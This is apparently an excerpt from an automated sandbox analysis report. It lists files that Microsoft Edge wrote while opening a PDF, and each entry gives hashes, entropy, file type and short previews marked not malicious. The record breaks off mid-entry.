                                                                                                                                                                                                                                                                  SHA-256:693A60684AA9FF4F01CB6027E9C938F4701C0C898AFC224A0776CB1E18E87166
                                                                                                                                                                                                                                                                  SHA-512:E8B1DF36A237BCBBAD897146CA247EDF75466B2A4030FEC620C46932B5C31137F2931CD2758534E4308AED3FB9CC40EDF2D7646A38530BCC5E6D7069C19A3B1F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f...............

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                                  Entropy (8bit):5.109634858831933
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPCM+q2PN723oH+TcwtrQMxIFUt8OoPAXZmw+OoP4VMVkwON723oH+TcwtrQMFd:7nM+vVaYebCFUt8OPX/+OJMV5OaYebtJ
                                                                                                                                                                                                                                                                  MD5:6B5FCE09D9770CDF5AD7E1C218B9E483
                                                                                                                                                                                                                                                                  SHA1:7F695A25495EFBFA753E584D5704F98447E34DB8
                                                                                                                                                                                                                                                                  SHA-256:1205C5C85D0F41D0C083FA4D10DDBC416B66B4583440F3F1B7FA2993B38E2B23
                                                                                                                                                                                                                                                                  SHA-512:F2F1E3453E93DC59400BB3212633592CFFF4DE233591E0C147ADC001F6D591BC10BDC1B3177E8B237788F431D327F14B5709983729A2C86BCF8A8D72075AB8AF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:24.298 1e8c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/19-07:44:24.299 1e8c Recovering log #3.2024/12/19-07:44:24.322 1e8c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                                  Entropy (8bit):5.109634858831933
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPCM+q2PN723oH+TcwtrQMxIFUt8OoPAXZmw+OoP4VMVkwON723oH+TcwtrQMFd:7nM+vVaYebCFUt8OPX/+OJMV5OaYebtJ
                                                                                                                                                                                                                                                                  MD5:6B5FCE09D9770CDF5AD7E1C218B9E483
                                                                                                                                                                                                                                                                  SHA1:7F695A25495EFBFA753E584D5704F98447E34DB8
                                                                                                                                                                                                                                                                  SHA-256:1205C5C85D0F41D0C083FA4D10DDBC416B66B4583440F3F1B7FA2993B38E2B23
                                                                                                                                                                                                                                                                  SHA-512:F2F1E3453E93DC59400BB3212633592CFFF4DE233591E0C147ADC001F6D591BC10BDC1B3177E8B237788F431D327F14B5709983729A2C86BCF8A8D72075AB8AF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:24.298 1e8c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/19-07:44:24.299 1e8c Recovering log #3.2024/12/19-07:44:24.322 1e8c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13379085865829343

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2390
                                                                                                                                                                                                                                                                  Entropy (8bit):3.49924050811163
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:3i5eGqqPFXg+Ak+fk+94bDW5d3tnTL+Cgca:3i5e/qZ9WFEca
                                                                                                                                                                                                                                                                  MD5:1723A7E02512E05220B5B05A4C7BF771
                                                                                                                                                                                                                                                                  SHA1:B5862C656CA9228CB25705F35BE69BD41BE7E95D
                                                                                                                                                                                                                                                                  SHA-256:E54D4103822CC345A4770C819F016877C523C540B9CF68C77ACE3EF56791BCF7
                                                                                                                                                                                                                                                                  SHA-512:7ABB299E032CCB211E2F05BFE3078439D878A461963AF8AFE24019C3D5005516BB327F85A3C12053B9D8F355FCB272A019BAD187AD8A468A6FA2F918265F6D09
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SNSS.......2..............2........."2..............2..........2..........3..........3.......!..3..................................2...3...1..,...3...$...3bd9387f_ce6e_4058_927d_caa186a855f1...2..........3..................2......2.......................5..0...2...&...{46F3A197-DB49-410A-81B3-94975C835573}.....2.............4..........4.......!..4..................................2...4...1..,...4...$...2818ff11_9057_4863_8487_d9810712ff6d...2..........4........+.........4.......q..l...4.......U...file:///C:/Users/user/AppData/Local/Temp/6d0157c6-3d7d-48ab-8ec3-f1e0d1f3d02e.pdf.......T...P...!...H...........................................................@...............H...............@.......R...)..S...)..................................X...................................................U...f.i.l.e.:./././.C.:./.U.s.e.r.s./.e.n.g.i.n.e.e.r./.A.p.p.D.a.t.a./.L.o.c.a.l./.T.e.m.p./.6.d.0.1.5.7.c.6.-.3.d.7.d.-.4.8.a.b.-.8.e.c.3.-.f.1.e.0.d.1.f.3.d.0.2.e...p.d.f.....................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                  Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                  MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                  SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                  SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                  SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):356
                                                                                                                                                                                                                                                                  Entropy (8bit):5.147604440776529
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPJCjyq2PN723oH+Tcwt7Uh2ghZIFUt8OoPXr1Zmw+OoPX9RkwON723oH+Tcwts:73OvVaYebIhHh2FUt8OKr1/+OK75OaYz
                                                                                                                                                                                                                                                                  MD5:58D8B378627B367771128A73C8A5935D
                                                                                                                                                                                                                                                                  SHA1:58F8B4F2349B625636CF729FF8B20D1FF2571867
                                                                                                                                                                                                                                                                  SHA-256:751BADD1E2A6C746B56E7524A2C0C6121D91275A135ACB59BFB7FA7C9176AC61
                                                                                                                                                                                                                                                                  SHA-512:956896645EE65CC799D0E6F0CB58B53FBED3258F7F3F44F6474141C7A3BE799CF241FA55AEC465B76CDCFAB2448AB89997E6E46E57ADFBF56438FCC35F25E587
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:23.507 1dc0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/19-07:44:23.508 1dc0 Recovering log #3.2024/12/19-07:44:23.508 1dc0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):356
                                                                                                                                                                                                                                                                  Entropy (8bit):5.147604440776529
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPJCjyq2PN723oH+Tcwt7Uh2ghZIFUt8OoPXr1Zmw+OoPX9RkwON723oH+Tcwts:73OvVaYebIhHh2FUt8OKr1/+OK75OaYz
                                                                                                                                                                                                                                                                  MD5:58D8B378627B367771128A73C8A5935D
                                                                                                                                                                                                                                                                  SHA1:58F8B4F2349B625636CF729FF8B20D1FF2571867
                                                                                                                                                                                                                                                                  SHA-256:751BADD1E2A6C746B56E7524A2C0C6121D91275A135ACB59BFB7FA7C9176AC61
                                                                                                                                                                                                                                                                  SHA-512:956896645EE65CC799D0E6F0CB58B53FBED3258F7F3F44F6474141C7A3BE799CF241FA55AEC465B76CDCFAB2448AB89997E6E46E57ADFBF56438FCC35F25E587
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:23.507 1dc0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/19-07:44:23.508 1dc0 Recovering log #3.2024/12/19-07:44:23.508 1dc0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):438
                                                                                                                                                                                                                                                                  Entropy (8bit):5.226764624614346
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:7GpM+vVaYebvqBQFUt8O8X/+OwMV5OaYebvqBvJ:74dVaYebvZg8OIw2OaYebvk
                                                                                                                                                                                                                                                                  MD5:9B8058FB76C06C2A336A4929FE3DBB9C
                                                                                                                                                                                                                                                                  SHA1:B9A3A8787D3DCE9301198B0EF30AEB12BB825A4B
                                                                                                                                                                                                                                                                  SHA-256:9F130192A8E0F232AC77381A8AEC9B89DE1476B8FAA50E77D73448CB2061A132
                                                                                                                                                                                                                                                                  SHA-512:80238CC7393B6ACB13B122847F858928A079FB71A6624DD2790C574407E92D435783E6D9DAF9A3D1E8CE9EAADE9E90A714506FEC4418C15A351DE1EC0ED2F2B0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:24.460 1e8c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/19-07:44:24.463 1e8c Recovering log #3.2024/12/19-07:44:24.468 1e8c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):438
                                                                                                                                                                                                                                                                  Entropy (8bit):5.226764624614346
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:7GpM+vVaYebvqBQFUt8O8X/+OwMV5OaYebvqBvJ:74dVaYebvZg8OIw2OaYebvk
                                                                                                                                                                                                                                                                  MD5:9B8058FB76C06C2A336A4929FE3DBB9C
                                                                                                                                                                                                                                                                  SHA1:B9A3A8787D3DCE9301198B0EF30AEB12BB825A4B
                                                                                                                                                                                                                                                                  SHA-256:9F130192A8E0F232AC77381A8AEC9B89DE1476B8FAA50E77D73448CB2061A132
                                                                                                                                                                                                                                                                  SHA-512:80238CC7393B6ACB13B122847F858928A079FB71A6624DD2790C574407E92D435783E6D9DAF9A3D1E8CE9EAADE9E90A714506FEC4418C15A351DE1EC0ED2F2B0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:24.460 1e8c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/19-07:44:24.463 1e8c Recovering log #3.2024/12/19-07:44:24.468 1e8c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\35b32b84-8bdc-4b0c-9258-122e596fad65.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):111
                                                                                                                                                                                                                                                                  Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                  MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                  SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                  SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                  SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\597a01ff-ecad-478e-b3e2-44e6fa487788.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\5dfa2779-1f46-4522-8372-5a5c8c67b9e5.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\61ae35a9-c9c2-49be-b683-d92434234987.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):111
                                                                                                                                                                                                                                                                  Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                  MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                  SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                  SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                  SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF3bbcf.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
